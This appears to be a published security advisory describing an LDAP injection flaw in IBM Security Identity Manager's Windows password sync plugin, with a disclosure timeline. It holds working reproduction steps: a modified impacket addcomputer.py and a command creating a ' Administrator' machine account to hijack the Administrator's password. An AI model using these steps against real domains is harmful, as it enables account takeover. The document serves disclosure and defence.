LDAP Injection leading to account takeover
IBM Security Identity Manager Windows Password Synch Plug-in
Krzysztof Andrusiak and Marcin Ogorzelski
Vulnerability allows an attacker to modify LDAP query sent by plugin by using specially crafted account name, possibly leading to account takeover.
In order to exploit this vulnerability, an attacker must have access to domain account with privileges to either modify account names or join computers to the domain (by default every domain user can join up to 10 machines to the domain).
An example LDAP query sent by plugin during "Administrator" account password change is presented below:
If a new account (either user or machine one) with name " Administrator" (with leading space) was created in the domain, then the following LDAP request would be sent:
Since leading whitespace characters are ignored, the "Administrator" user account (without leading space) would be returned as search result. ISIM plugin would then send the password change request to ISIM server for "eruid= Administrator" user.
PoC was tested in the following environment:
- Domain Controller: Windows Server 2019 (with default configuration and ISIM plugin)
- Client machine: Windows 10 (with Python 3.9.2)
Steps to reproduce:
- Install impacket module using the following command:
python -m pip install impacket
- Copy "addcomputer.py" script (from "<Python install dir>\Scripts" folder) to another directory. This script can also be downloaded from https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py.
- Remove or comment out the following part of the copied script (so that script will allow creating machine accounts without trailing '$' symbol).
else: if self.__computerName[-1] != '$': self.__computerName += '$'
- Open PowerShell and go to the modified script's directory.
- Execute the following command in order to add new machine account named " Administrator" (with leading space). Replace "DOMAIN.LOCAL/account" with user which has privileges to join computers to domain (by default every domain user can join up to 10 machines).
python addcomputer.py -computer-name " Administrator" -computer-pass "Password1!" DOMAIN.LOCAL/account
When prompted, enter password for chosen domain account ("DOMAIN.LOCAL/account").
- After adding machine account the following HTTPS request will be sent by plugin to ISIM server:
<?xml version="1.0" encoding="UTF-8"?><PSWD_REQ_MSG><CREDENTIALS principal="test" pswd="test"/><REQUEST op="synch" srcDN="erservicename=testservice,o=testorg" userDN="erUid= Administrator" pswd="Password1!"/></PSWD_REQ_MSG>
- 10-03-2021 - Vulnerability reported to vendor
- 22-03-2021 - First response from vendor
- 02-04-2021 - Vulnerability acknowledged by vendor
- 29-06-2021 - Advisory published by IBM
- 15-07-2021 - Public disclosure
- 23-08-2021 - PoC release